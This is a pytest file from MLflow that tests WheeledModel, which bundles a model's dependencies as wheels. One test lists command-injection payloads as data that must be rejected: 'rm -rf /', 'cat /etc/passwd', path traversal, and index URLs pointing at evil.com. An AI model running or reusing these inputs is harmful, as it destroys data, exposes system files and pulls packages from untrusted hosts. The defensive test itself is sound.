/ tests / models / test_wheeled_model.py
test_wheeled_model.py
  1  import os
  2  import random
  3  import re
  4  from io import BytesIO
  5  from typing import Any, NamedTuple
  6  from unittest import mock
  7  
  8  import numpy as np
  9  import pandas as pd
 10  import pytest
 11  import sklearn.neighbors as knn
 12  import yaml
 13  from sklearn import datasets
 14  
 15  import mlflow
 16  import mlflow.pyfunc.scoring_server as pyfunc_scoring_server
 17  from mlflow.exceptions import MlflowException
 18  from mlflow.models.model import METADATA_FILES
 19  from mlflow.models.utils import load_serving_example
 20  from mlflow.models.wheeled_model import _ORIGINAL_REQ_FILE_NAME, _WHEELS_FOLDER_NAME, WheeledModel
 21  from mlflow.pyfunc.model import MLMODEL_FILE_NAME, Model
 22  from mlflow.store.artifact.utils.models import _improper_model_uri_msg
 23  from mlflow.tracking.artifact_utils import _download_artifact_from_uri
 24  from mlflow.utils.environment import (
 25      _CONDA_ENV_FILE_NAME,
 26      _REQUIREMENTS_FILE_NAME,
 27      _is_pip_deps,
 28      _mlflow_conda_env,
 29  )
 30  
 31  from tests.helper_functions import (
 32      _is_available_on_pypi,
 33      _mlflow_major_version_string,
 34      pyfunc_serve_and_score_model,
 35  )
 36  
 37  EXTRA_PYFUNC_SERVING_TEST_ARGS = (
 38      [] if _is_available_on_pypi("scikit-learn", module="sklearn") else ["--env-manager", "local"]
 39  )
 40  
 41  
 42  class ModelWithData(NamedTuple):
 43      model: Any
 44      inference_data: Any
 45  
 46  
 47  @pytest.fixture(scope="module")
 48  def sklearn_knn_model():
 49      iris = datasets.load_iris()
 50      X = iris.data[:, :2]  # we only take the first two features.
 51      y = iris.target
 52      knn_model = knn.KNeighborsClassifier()
 53      knn_model.fit(X, y)
 54      return ModelWithData(model=knn_model, inference_data=X)
 55  
 56  
 57  def random_int(lo=1, hi=1000000000):
 58      return random.randint(int(lo), int(hi))
 59  
 60  
 61  def _get_list_from_file(path):
 62      with open(path) as file:
 63          return file.read().splitlines()
 64  
 65  
 66  def _get_pip_requirements_list(path):
 67      return _get_list_from_file(path)
 68  
 69  
 70  def get_pip_requirements_from_conda_file(conda_env_path):
 71      with open(conda_env_path) as f:
 72          conda_env = yaml.safe_load(f)
 73  
 74      conda_pip_requirements_list = []
 75      dependencies = conda_env.get("dependencies")
 76  
 77      for dependency in dependencies:
 78          if _is_pip_deps(dependency):
 79              conda_pip_requirements_list = dependency["pip"]
 80  
 81      return conda_pip_requirements_list
 82  
 83  
 84  def validate_updated_model_file(original_model_config, wheeled_model_config):
 85      differing_keys = {"run_id", "utc_time_created", "model_uuid", "artifact_path"}
 86      ignore_keys = {"model_id"}
 87  
 88      # Compare wheeled model configs with original model config (MLModel files)
 89      for key in original_model_config.keys() - ignore_keys:
 90          if key not in differing_keys:
 91              assert wheeled_model_config[key] == original_model_config[key]
 92          else:
 93              assert wheeled_model_config[key] != original_model_config[key]
 94  
 95      # Wheeled model key should only exist in wheeled_model_config
 96      assert wheeled_model_config.get(_WHEELS_FOLDER_NAME, None)
 97      assert not original_model_config.get(_WHEELS_FOLDER_NAME, None)
 98  
 99      # Every key in the original config should also exist in the wheeled config.
100      for key in original_model_config:
101          assert key in wheeled_model_config
102  
103  
def validate_updated_conda_dependencies(original_model_path, wheeled_model_path):
    """Assert the wheeled model's conda.yaml differs from the original only in ``dependencies``.

    Both environment files must declare exactly the same top-level keys. Every key other than
    ``dependencies`` must be identical, while ``dependencies`` must differ.

    Args:
        original_model_path: Local directory of the original (non-wheeled) model.
        wheeled_model_path: Local directory of the wheeled model.
    """
    wheeled_conda_env_path = os.path.join(wheeled_model_path, _CONDA_ENV_FILE_NAME)
    original_conda_env_path = os.path.join(original_model_path, _CONDA_ENV_FILE_NAME)

    with open(wheeled_conda_env_path) as f:
        wheeled_conda_env = yaml.safe_load(f)
    with open(original_conda_env_path) as f:
        original_conda_env = yaml.safe_load(f)

    # Comparing key sets first catches keys dropped from (or added to) either side; iterating
    # only one env's keys would silently miss them.
    assert set(wheeled_conda_env) == set(original_conda_env)
    assert "dependencies" in wheeled_conda_env

    for key, wheeled_value in wheeled_conda_env.items():
        if key == "dependencies":
            assert wheeled_value != original_conda_env[key]
        else:
            assert wheeled_value == original_conda_env[key]
122  
123  
def validate_wheeled_dependencies(wheeled_model_path):
    """Assert requirements.txt, conda.yaml and the wheels directory all agree.

    The pip requirements in requirements.txt and in conda.yaml must be the same set. Each of
    them must be the relative path (``<wheels folder>/<file>.whl``) of a wheel in the wheels
    directory, one-to-one.
    """
    requirements = sorted(
        _get_pip_requirements_list(os.path.join(wheeled_model_path, _REQUIREMENTS_FILE_NAME))
    )
    conda_pip_requirements = sorted(
        get_pip_requirements_from_conda_file(
            os.path.join(wheeled_model_path, _CONDA_ENV_FILE_NAME)
        )
    )
    assert requirements == conda_pip_requirements

    wheels_dir = os.path.join(wheeled_model_path, _WHEELS_FOLDER_NAME)
    bundled_wheels = sorted(
        os.path.join(_WHEELS_FOLDER_NAME, entry)
        for entry in os.listdir(wheels_dir)
        if entry.endswith(".whl")
    )
    assert bundled_wheels == requirements
146  
147  
def test_model_log_load(tmp_path, sklearn_knn_model):
    """Re-logging a registered model via WheeledModel yields a consistent wheeled version 2."""
    registered_name = f"wheels-test-{random_int()}"
    original_uri = f"models:/{registered_name}/1"
    wheeled_uri = f"models:/{registered_name}/2"

    # Version 1: the plain sklearn model.
    with mlflow.start_run():
        mlflow.sklearn.log_model(
            sklearn_knn_model.model,
            name="model",
            registered_model_name=registered_name,
        )
        original_path = _download_artifact_from_uri(original_uri, tmp_path)
        original_config = Model.load(os.path.join(original_path, MLMODEL_FILE_NAME)).__dict__

    # Version 2: the same model re-logged with its dependencies bundled as wheels.
    with mlflow.start_run():
        WheeledModel.log_model(model_uri=original_uri)
        wheeled_path = _download_artifact_from_uri(wheeled_uri)
        active_run_id = mlflow.tracking.fluent._get_or_start_run().info.run_id
        wheeled_config = Model.load(os.path.join(wheeled_path, MLMODEL_FILE_NAME)).__dict__

    validate_updated_model_file(original_config, wheeled_config)
    # The wheeled model must be attributed to the run that re-logged it.
    assert wheeled_config["run_id"] == active_run_id
    validate_updated_conda_dependencies(original_path, wheeled_path)
    validate_wheeled_dependencies(wheeled_path)
180  
181  
def test_model_save_load(tmp_path, sklearn_knn_model):
    """WheeledModel.save_model writes a consistent wheeled copy and returns its Model."""
    registered_name = f"wheels-test-{random_int()}"
    original_uri = f"models:/{registered_name}/1"
    download_dir = os.path.join(tmp_path, "m")
    wheeled_path = os.path.join(tmp_path, "wm")
    os.mkdir(download_dir)

    # Register the plain sklearn model and snapshot its MLmodel config.
    with mlflow.start_run():
        mlflow.sklearn.log_model(
            sklearn_knn_model.model,
            name="model",
            registered_model_name=registered_name,
        )
        original_path = _download_artifact_from_uri(original_uri, download_dir)
        original_config = Model.load(os.path.join(original_path, MLMODEL_FILE_NAME)).__dict__

    # Save a wheeled copy to a local directory.
    with mlflow.start_run():
        returned_model = WheeledModel(model_uri=original_uri).save_model(path=wheeled_path)
        saved_model = Model.load(os.path.join(wheeled_path, MLMODEL_FILE_NAME))
        # save_model must return exactly what it wrote to the MLmodel file.
        assert saved_model == returned_model

    validate_updated_model_file(original_config, saved_model.__dict__)
    validate_updated_conda_dependencies(original_path, wheeled_path)
    validate_wheeled_dependencies(wheeled_path)
213  
214  
def test_logging_and_saving_wheeled_model_throws(tmp_path, sklearn_knn_model):
    """An already wheeled model can be neither re-logged nor re-saved as a wheeled model."""
    registered_name = f"wheels-test-{random_int()}"
    source_uri = f"models:/{registered_name}/1"
    already_wheeled_uri = f"models:/{registered_name}/2"
    expected_error = re.escape("Model libraries are already added")

    # Version 1: plain sklearn model.
    with mlflow.start_run():
        mlflow.sklearn.log_model(
            sklearn_knn_model.model,
            name="model",
            registered_model_name=registered_name,
        )

    # Version 2: wheeled copy of version 1.
    with mlflow.start_run():
        WheeledModel.log_model(model_uri=source_uri)

    # Logging the wheeled version again must be rejected ...
    with pytest.raises(MlflowException, match=expected_error), mlflow.start_run():
        WheeledModel.log_model(model_uri=already_wheeled_uri)

    # ... and so must saving it to a local path.
    destination = os.path.join(tmp_path, "test")
    with pytest.raises(MlflowException, match=expected_error), mlflow.start_run():
        WheeledModel(already_wheeled_uri).save_model(destination)
249  
250  
def test_log_model_with_non_model_uri():
    """WheeledModel rejects URIs that are not ``models:/`` URIs, for both log and save paths."""
    model_uri = "runs:/beefe0b6b5bd4acf9938244cdc006b64/model"
    # pytest.raises(match=...) runs re.search with the pattern, so escape the literal message to
    # match it verbatim rather than letting '.', quotes or brackets act as regex syntax.
    expected_error = re.escape(_improper_model_uri_msg(model_uri))

    # Log with wheels
    with pytest.raises(MlflowException, match=expected_error):
        with mlflow.start_run():
            WheeledModel.log_model(
                model_uri=model_uri,
            )

    # Save with wheels (the constructor already validates the URI)
    with pytest.raises(MlflowException, match=expected_error):
        with mlflow.start_run():
            WheeledModel(model_uri)
265  
266  
def test_create_pip_requirement(tmp_path):
    """_create_pip_requirement writes the conda env's pip dependencies to a requirements file."""
    expected_mlflow_version = _mlflow_major_version_string()
    model_name = f"wheels-test-{random_int()}"
    model_uri = f"models:/{model_name}/1"
    conda_env_path = os.path.join(tmp_path, "conda.yaml")
    pip_reqs_path = os.path.join(tmp_path, "requirements.txt")

    wm = WheeledModel(model_uri)

    expected_pip_deps = [expected_mlflow_version, "cloudpickle==2.1.0", "psutil==5.8.0"]
    _mlflow_conda_env(
        path=conda_env_path, additional_pip_deps=expected_pip_deps, install_mlflow=False
    )
    wm._create_pip_requirement(conda_env_path, pip_reqs_path)
    with open(pip_reqs_path) as f:
        # Skip blank lines so only actual requirement entries are compared.
        pip_reqs = [line.strip() for line in f if line.strip()]

    # Compare sorted copies: list.sort() sorts in place and returns None, so comparing two
    # `.sort()` results would be `None == None` and could never fail.
    assert sorted(pip_reqs) == sorted(expected_pip_deps)
284  
285  
def test_update_conda_env_only_updates_pip_deps(tmp_path):
    """_update_conda_env must replace only the pip section of conda.yaml.

    The env name, channels and every non-pip dependency must be unchanged. The single pip
    section must keep its position and have its list swapped for ``new_pip_deps``. No
    dependency entry may be added or dropped.
    """
    expected_mlflow_version = _mlflow_major_version_string()
    model_name = f"wheels-test-{random_int()}"
    model_uri = f"models:/{model_name}/1"
    conda_env_path = os.path.join(tmp_path, "conda.yaml")
    pip_deps = [expected_mlflow_version, "cloudpickle==2.1.0", "psutil==5.8.0"]
    new_pip_deps = ["wheels/mlflow", "wheels/cloudpickle", "wheels/psutil"]

    wm = WheeledModel(model_uri)
    additional_conda_deps = ["add_conda_deps"]
    additional_conda_channels = ["add_conda_channels"]

    _mlflow_conda_env(
        conda_env_path,
        additional_conda_deps,
        pip_deps,
        additional_conda_channels,
        install_mlflow=False,
    )
    with open(conda_env_path) as f:
        old_conda_yaml = yaml.safe_load(f)
    wm._update_conda_env(new_pip_deps, conda_env_path)
    with open(conda_env_path) as f:
        new_conda_yaml = yaml.safe_load(f)

    assert old_conda_yaml.get("name") == new_conda_yaml.get("name")
    assert old_conda_yaml.get("channels") == new_conda_yaml.get("channels")

    old_deps = old_conda_yaml.get("dependencies")
    new_deps = new_conda_yaml.get("dependencies")
    # zip() silently stops at the shorter list; check lengths so an added or dropped
    # dependency entry cannot go unnoticed.
    assert len(old_deps) == len(new_deps)

    pip_sections_seen = 0
    for old_item, new_item in zip(old_deps, new_deps):
        if isinstance(old_item, dict):
            # The pip section must stay in place; only its list of packages may change.
            assert isinstance(new_item, dict)
            assert old_item.get("pip") == pip_deps
            assert new_item.get("pip") == new_pip_deps
            pip_sections_seen += 1
        else:
            assert old_item == new_item
    # Guard against a vacuous pass if no pip section was written at all.
    assert pip_sections_seen == 1
321  
322  
def test_serving_wheeled_model(sklearn_knn_model):
    """Serving the wheeled model via the pyfunc scoring server reproduces the model's predictions."""
    registered_name = f"wheels-test-{random_int()}"
    model, inference_data = sklearn_knn_model

    # Version 1: plain sklearn model with an input example (used to build the serving payload).
    with mlflow.start_run():
        logged = mlflow.sklearn.log_model(
            model,
            name="model",
            registered_model_name=registered_name,
            input_example=pd.DataFrame(inference_data),
        )

    # Version 2: wheeled copy of version 1.
    with mlflow.start_run():
        WheeledModel.log_model(model_uri=f"models:/{registered_name}/1")

    payload = load_serving_example(logged.model_uri)
    response = pyfunc_serve_and_score_model(
        f"models:/{registered_name}/2",
        data=payload,
        content_type=pyfunc_scoring_server.CONTENT_TYPE_JSON,
        extra_args=EXTRA_PYFUNC_SERVING_TEST_ARGS,
    )
    served = pd.read_json(BytesIO(response.content), orient="records").values.squeeze()
    np.testing.assert_array_almost_equal(served, model.predict(inference_data))
352  
353  
def test_wheel_download_works(tmp_path):
    """Downloading wheels for a one-line requirements file yields a single matching .whl."""
    package = "cloudpickle"
    reqs_path = os.path.join(tmp_path, "req.txt")
    wheels_dir = os.path.join(tmp_path, "wheels")
    with open(reqs_path, "w") as fh:
        fh.write(package)

    WheeledModel._download_wheels(reqs_path, wheels_dir)

    downloaded = os.listdir(wheels_dir)
    assert len(downloaded) == 1  # exactly one file was downloaded
    (wheel_name,) = downloaded
    assert wheel_name.endswith(".whl")  # it is a wheel ...
    assert package in wheel_name  # ... for the requested package
366  
367  
def test_wheel_download_override_option_works(tmp_path, monkeypatch):
    """Overriding pip options via the env var lets a wheel download succeed that fails by default."""
    reqs_path = os.path.join(tmp_path, "req.txt")
    wheels_dir = os.path.join(tmp_path, "wheels")
    with open(reqs_path, "w") as fh:
        fh.write("pyspark")

    # With the default options the download fails.
    expected_error = "An error occurred while downloading the dependency wheels"
    with pytest.raises(MlflowException, match=expected_error):
        WheeledModel._download_wheels(reqs_path, wheels_dir)

    # With --prefer-binary supplied through the override, at least one wheel is produced.
    monkeypatch.setenv("MLFLOW_WHEELED_MODEL_PIP_DOWNLOAD_OPTIONS", "--prefer-binary")
    WheeledModel._download_wheels(reqs_path, wheels_dir)
    assert os.listdir(wheels_dir)
385  
386  
def test_wheel_download_dependency_conflicts(tmp_path):
    """Conflicting pins raise an MlflowException that includes pip's conflict explanation."""
    conflicting_reqs = tmp_path / "requirements.txt"
    conflicting_reqs.write_text("mlflow==2.15.0\nmlflow==2.16.0")
    # The message must name both pins and carry the resolver's "conflict is caused by" details.
    conflict_pattern = (
        r"Cannot install mlflow==2\.15\.0 and mlflow==2\.16\.0.+The conflict is caused by"
    )
    with pytest.raises(MlflowException, match=conflict_pattern):
        WheeledModel._download_wheels(conflicting_reqs, tmp_path / "wheels")
396  
397  
def test_copy_metadata(mock_is_in_databricks, sklearn_knn_model):
    """The wheeled model gets a ``metadata`` dir only when running in Databricks.

    When ``mock_is_in_databricks`` reports True, the directory must contain exactly
    ``METADATA_FILES`` plus the original requirements file. Otherwise it must be absent.
    """
    # Use a unique registered-model name like the rest of this module, so that version 1 is
    # guaranteed to be the model logged here rather than one left by another test.
    model_name = f"wheels-test-{random_int()}"
    with mlflow.start_run():
        mlflow.sklearn.log_model(
            sklearn_knn_model.model,
            name="model",
            registered_model_name=model_name,
        )

    with mlflow.start_run():
        model_info = WheeledModel.log_model(model_uri=f"models:/{model_name}/1")

    artifact_path = mlflow.artifacts.download_artifacts(model_info.model_uri)
    metadata_path = os.path.join(artifact_path, "metadata")
    if mock_is_in_databricks.return_value:
        assert set(os.listdir(metadata_path)) == set(METADATA_FILES + [_ORIGINAL_REQ_FILE_NAME])
    else:
        assert not os.path.exists(metadata_path)
    # The Databricks check is expected to be consulted exactly twice across this test.
    assert mock_is_in_databricks.call_count == 2
416  
417  
def test_wheel_download_prevents_command_injection(tmp_path, monkeypatch):
    """Pip option overrides carrying shell syntax, paths or index/host options are rejected."""
    rejected_options = (
        "--only-binary=:all: && echo pwned",
        "--prefer-binary; rm -rf /",
        "--no-binary=:none: | cat /etc/passwd",
        "../../../etc/passwd",
        "--extra-index-url http://evil.com",
        "--find-links /tmp",
        "--index-url http://malicious.com",
        "--trusted-host evil.com",
        "--only-binary=package`rm -rf /`",
        "--config-settings malicious=value",
    )
    reqs_path = tmp_path / "req.txt"
    wheels_dir = tmp_path / "wheels"

    for option in rejected_options:
        monkeypatch.setenv("MLFLOW_WHEELED_MODEL_PIP_DOWNLOAD_OPTIONS", option)
        with pytest.raises(MlflowException, match="Invalid pip wheel option"):
            WheeledModel._download_wheels(reqs_path, wheels_dir)
436  
437  
def test_wheel_download_allowed_options(tmp_path, monkeypatch):
    """Each allow-listed pip option, alone or combined, is forwarded to ``subprocess.run``."""
    reqs_path = tmp_path / "req.txt"
    wheels_dir = tmp_path / "wheels"

    def _assert_forwarded(option_value):
        # Run the download with subprocess.run mocked and check the option reached the command.
        monkeypatch.setenv("MLFLOW_WHEELED_MODEL_PIP_DOWNLOAD_OPTIONS", option_value)
        with mock.patch("subprocess.run") as mock_run:
            WheeledModel._download_wheels(reqs_path, wheels_dir)
            mock_run.assert_called_once()
            command = mock_run.call_args[0][0]
            assert option_value in command

    single_options = (
        "--only-binary=:all:",
        "--only-binary=:none:",
        "--no-binary=:all:",
        "--no-binary=:none:",
        "--prefer-binary",
        "--no-build-isolation",
        "--use-pep517",
        "--check-build-dependencies",
        "--ignore-requires-python",
        "--no-deps",
        "--no-verify",
        "--pre",
        "--require-hashes",
        "--no-clean",
    )
    for option in single_options:
        _assert_forwarded(option)

    # Several allow-listed options may be combined in one setting.
    _assert_forwarded("--prefer-binary --no-clean")
470  
471  
def test_wheel_download_extra_envs(tmp_path, monkeypatch):
    """extra_envs reach the pip subprocess alongside the existing process environment."""
    monkeypatch.setenv("MLFLOW_WHEELED_MODEL_PIP_DOWNLOAD_OPTIONS", "--prefer-binary")
    extra_envs = {
        "PIP_INDEX_URL": "https://test.pypi.org/simple/",
        "PIP_TRUSTED_HOST": "test.pypi.org",
        "CUSTOM_VAR": "test_value",
    }

    with mock.patch("subprocess.run", return_value=mock.Mock(returncode=0)) as mock_run:
        WheeledModel._download_wheels(
            tmp_path / "req.txt", tmp_path / "wheels", extra_envs=extra_envs
        )

        mock_run.assert_called_once()
        positional, keyword = mock_run.call_args
        assert "--prefer-binary" in positional[0]

        env_passed = keyword["env"]
        for name, value in extra_envs.items():
            assert env_passed[name] == value
        # Variables already in the process environment must still be present.
        assert env_passed["PATH"] == os.environ["PATH"]
497  
498  
def test_wheel_download_no_extra_envs(tmp_path, monkeypatch):
    """Without extra_envs, subprocess.run is called with ``env=None`` (inherit the parent env)."""
    monkeypatch.setenv("MLFLOW_WHEELED_MODEL_PIP_DOWNLOAD_OPTIONS", "--prefer-binary")

    with mock.patch("subprocess.run", return_value=mock.Mock(returncode=0)) as mock_run:
        WheeledModel._download_wheels(tmp_path / "req.txt", tmp_path / "wheels", extra_envs=None)
        mock_run.assert_called_once()
        _, keyword = mock_run.call_args
        assert keyword["env"] is None